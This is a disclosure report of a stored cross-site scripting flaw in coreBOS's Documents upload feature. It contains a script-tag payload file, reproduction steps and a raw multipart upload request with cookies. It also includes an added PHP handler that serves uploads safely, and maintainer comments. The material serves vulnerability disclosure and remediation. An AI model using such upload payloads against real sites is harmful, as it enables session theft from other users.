Stored XSS via upload file in tsolucio/corebos
Reported on
Mar 23rd 2022
Description
In the Documents feature, you can upload a .ofd file that can contain an XSS payload.
Proof of Concept
// xss.ofd
<script>alert(1)</script>
Step 1: Go to Support -> Documents
Step 2: Click Create Documents
Step 3: For Download type, choose Internal. Upload the xss.ofd file above.
Step 4: Open that file's link, such as: https://demo.corebos.com/storage/2022/March/week4/43911_xss.ofd. You will see the alert there.
Request:
POST /index.php HTTP/2
Host: demo.corebos.com
Cookie: democoreboscom=792a9ee53093e76746fd348bc7a03e33; ck_login_id_vtiger=7; timezone=0; corebos_browsertabID=9866295214548453
Content-Length: 4287
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://demo.corebos.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryN1dAzo74J4FoIATI
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://demo.corebos.com/index.php?module=Documents&action=EditView&return_action=DetailView
Connection: close
…………………………………………………………….
------WebKitFormBoundaryN1dAzo74J4FoIATI
Content-Disposition: form-data; name="filename"; filename="xss.ofd"
Content-Type: application/octet-stream
<script>alert(1)</script>
------WebKitFormBoundaryN1dAzo74J4FoIATI
Content-Disposition: form-data; name="filename_hidden"
xss.ofd
…………………………………………………………….
Impact
A user can upload a poisoned file and share its link with another user to steal their cookie, ...
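One way to keep a stored upload such as xss.ofd from being rendered as HTML, given here as an added example (it is not coreBOS code and not the project's fix): serve uploads through a handler that sets explicit response headers instead of exposing the storage directory directly. The function names, the inline allowlist and the storage root are assumptions.

```php
<?php
// Added example, not coreBOS code. All names below are hypothetical.

// Extensions allowed to render inline, with the exact type to declare (assumed allowlist).
const INLINE_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

// Build response headers for a stored upload. Any extension outside the
// allowlist (such as .ofd) is forced to a non-renderable download.
function download_headers(string $storedName): array
{
    $ext = strtolower(pathinfo($storedName, PATHINFO_EXTENSION));
    $inline = array_key_exists($ext, INLINE_TYPES);
    // Keep only a conservative character set in the advertised filename.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($storedName));
    return [
        'Content-Type'            => $inline ? INLINE_TYPES[$ext] : 'application/octet-stream',
        'Content-Disposition'     => ($inline ? 'inline' : 'attachment') . '; filename="' . $safeName . '"',
        'X-Content-Type-Options'  => 'nosniff',  // no MIME sniffing of the body
        'Content-Security-Policy' => 'sandbox',  // no script execution even if rendered
    ];
}

// Stream a file from the storage root after confirming the resolved path stays inside it.
function serve_upload(string $storageRoot, string $relativePath): void
{
    $root = realpath($storageRoot);
    $path = realpath($storageRoot . '/' . $relativePath);
    if ($root === false || $path === false || !is_file($path)
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        return;
    }
    foreach (download_headers($path) as $name => $value) {
        header($name . ': ' . $value);
    }
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Constructed check on the command line, using the PoC filename from the report.
if (PHP_SAPI === 'cli') {
    foreach (download_headers('43911_xss.ofd') as $name => $value) {
        echo $name . ': ' . $value . PHP_EOL;
    }
}
```

This only helps if the web server no longer serves the storage directory directly, so that every download goes through the handler.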
@admin I can't mark this one as fixed, the button is deactivated
@joebordes - apologies for this. This looks like a bug on the platform. We have identified the cause, and are rolling back. You should be able to confirm the fix in about 15 minutes 👍